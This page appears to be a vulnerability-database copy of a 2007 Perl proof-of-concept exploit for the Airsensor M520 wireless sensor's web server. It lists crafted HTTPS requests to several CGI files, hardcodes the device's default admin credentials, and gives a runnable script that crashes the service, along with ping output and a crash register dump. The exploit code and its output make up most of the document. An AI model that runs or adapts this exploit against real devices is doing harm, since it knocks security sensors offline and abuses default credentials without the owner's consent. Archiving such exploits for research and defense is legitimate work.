Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

airsensor-dos.txt

🗓️ 19 Sep 2007 00:00:00Reported by Alex HernandezType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 37 Views

Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC, caused by unspecified error in cgis files filter, exploited through crafted HTTPS requests causing system crash. "Use DHCP" option must be set to "No". Buffer overflow debug log included

Code
`#!/usr/bin/perl -w  
#   
# Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC   
#   
# The vulnerability is caused due to an unspecified error in the cgis   
# files filter used for configure propierties. This can be exploited by   
# sending a specially crafted HTTPS request (necessary authentication),   
# which will cause the HTTPS service on the system to crash.   
#   
# Requisites: "Use DHCP" option interface mark "No"   
#   
# Examples:   
#   
# GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1   
# GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1   
# GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1   
#   
# Pinging:   
#   
# Before:   
#   
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64   
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64   
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64   
#   
# After:   
#   
# Hardware error.   
# Hardware error.   
# Hardware error.   
# Request timed out.   
# Request timed out.   
# Request timed out.   
#   
# C:\>nc -vvn 192.168.100.100 443   
# (UNKNOWN) [192.168.100.100] 443 (?): connection refused   
# sent 0, rcvd 0: NOTSOCK   
#  
# Buffer Overflow debug log:  
#  
# 1970-01-01 00:00:15 SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520  
# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR EXCEPTION ERROR  
# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4  
# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR Up Time: 00:08:51  
# 1970-01-01 00:00:15 SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55  
# 1970-01-01 00:00:15 SYS-CRIT:: Exception ID = 10 ( Reserved Instruction)  
# 1970-01-01 00:00:15 SYS-CRIT:: Thread = HTTPD  
# 1970-01-01 00:00:15 SYS-CRIT:: MIPS Register Dump:  
# 1970-01-01 00:00:15 SYS-CRIT:: zero=0x00000000 at=0xfffffffe v0=0x00000000 v1=0x00000000  
# 1970-01-01 00:00:16 SYS-CRIT:: a0=0x00000000 a1=0x3d000000 a2=0x00000010 a3=0x00000041  
# 1970-01-01 00:00:16 SYS-CRIT:: t0=0x00000000 t1=0x0000003d t2=0x0000000b t3=0x00000000  
# 1970-01-01 00:00:16 SYS-CRIT:: t4=0x802f799c t5=0xf43dd40f t6=0x0066a1a4 t7=0x4df0e494  
# 1970-01-01 00:00:16 SYS-CRIT:: s0=0x802f7dbf s1=0x0000001f s2=0x802f7910 s3=0x80120000  
# 1970-01-01 00:00:16 SYS-CRIT:: s4=0x80120000 s5=0x80986c30 s6=0x80120000 s7=0x80128afc  
# 1970-01-01 00:00:16 SYS-CRIT:: t8=0x480ec8cd t9=0x742b7136 k0=0x802f78c8 k1=0x802f7910  
# 1970-01-01 00:00:16 SYS-CRIT:: gp=0x8015b070 sp=0x802f7910 fp=0x80128aec ra=0x800b2534  
# 1970-01-01 00:00:16 SYS-CRIT:: Address of instruction that caused exception = 0x800b2534  
# 1970-01-01 00:00:16 SYS-CRIT:: Memory address at which adress exception occured = 0x00000000  
# 1970-01-01 00:00:16 SYS-CRIT:: Return address = 0x800b2534  
# 1970-01-01 00:00:17 SYS-CRIT:: Status Reg = 0x1000af03  
# 1970-01-01 00:00:17 SYS-CRIT:: Cache Reg = 0x00000000  
# 1970-01-01 00:00:17 SYS-CRIT:: Cause Reg = 0x30000028  
# 1970-01-01 00:00:17 SYS-CRIT:: Config Reg = 0x03fffbfb  
# 1970-01-01 00:00:17 SYS-CRIT:: Vector = 40  
# 1970-01-01 00:00:17 SYS-CRIT:: Processor Version = 0x00018009  
# 1970-01-01 00:00:17 SYS-CRIT:: Stack Trace Begin: "->" = return address  
# 1970-01-01 00:00:17 SYS-CRIT:: [802f7910]=0x802f7dbf  
# 1970-01-01 00:00:17 SYS-CRIT:: [802f7914]=0x00000000  
# 1970-01-01 00:00:17 SYS-CRIT:: [802f7918]=0x00000000  
# 1970-01-01 00:00:19 SYS-CRIT:: [802f7990]=0x80130000  
# 1970-01-01 00:00:19 SYS-CRIT:: [802f7994]=0x802f7db4  
# 1970-01-01 00:00:19 SYS-CRIT:: [802f7998]=0x80152e18  
# 1970-01-01 00:00:19 SYS-CRIT:: [802f799c]=0x80152ed8  
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a0]=0x802f7dbf  
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a4]=0x80986c30  
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a8]=0x802f8200  
# 1970-01-01 00:00:19 SYS-CRIT:: ->[802f79ac]=0x800f0450 <- return address  
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79b0]=0x0d0a0074  
# 1970-01-01 00:00:21 SYS-CRIT:: Stack Trace End:  
#   
# The vulnerability has been reported in versions Airdefense   
#  
# Firmware Version 4.3.1.1, Model = M520  
# Firmware version 4.4.1.4, Model = M520   
#   
# More information: http://www.airdefense.net  
# http://support.airdefense.net  
#  
# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd.  
#   
# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55,   
# pikah, codebreak, h3llfyr3  
#   
# Alex Hernandez ahernandez [at] sybsecurity dot com  
#  
  
use strict;  
use LWP;  
use Data::Dumper;  
require HTTP::Request;  
require HTTP::Headers;  
  
my $string = "%41%41%41"; # Strings to send  
my $method = 'GET'; # Method "GET" or "POST"  
my $uri = 'https://192.168.100.100'; # Factory default IP address   
my $content = "/adLog.cgi?"; # Cgi's file to crash  
  
#my $content = "/ad.cgi?";  
#my $content = "/post.cgi?";  
#my $content = "/logout.cgi?";  
  
my $headers = HTTP::Headers->new(  
  
'Host:' => '192.168.100.100',  
'User-Agent:' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',  
'Accept:' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',  
'Accept-Language:' => 'en-us,en;q=0.5',  
'Accept-Charset:' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',   
'Keep-Alive:' => '300',  
'Connection:' => 'keep-alive',  
'Referer:' => 'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh',  
'Authorization:' => 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode admin:airsensor  
  
);  
  
my $request = HTTP::Request->new($method, $uri, $headers, $content, $string);  
  
my $ua = LWP::UserAgent->new;  
my $response = $ua->request($request);  
  
print "[+] Denial of Service exploit for Airsensor M520 Final\n";  
print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n";  
print "[+] We got this response from sensor: \n\n" . $response->content . "\n";  
  
my $data;  
foreach my $pair (split('&', $response->content)) {  
my ($k, $v) = split('=', $pair);  
$data->{$k} = $v;  
}  
  
if ($data->{RESULT} != 0) {  
  
print "[+] Denial of Service exploit for Airsensor M520 Final\n";  
print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n";  
print "[+] Use:\n";  
print "\tperl -x dos_sensor.pl\n";  
print $data->{RESPMSG} . "\n";  
exit(0);  
  
} else {  
  
print "[+] Denial of service Exploit successed!!!\n";  
print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n";  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Sep 2007 00:00Current
7.4High risk
Vulners AI Score7.4
airsensor m520denial of servicebuffer overflowcgis files filterhttps requestsdhcp optionsystem crashdebug log
37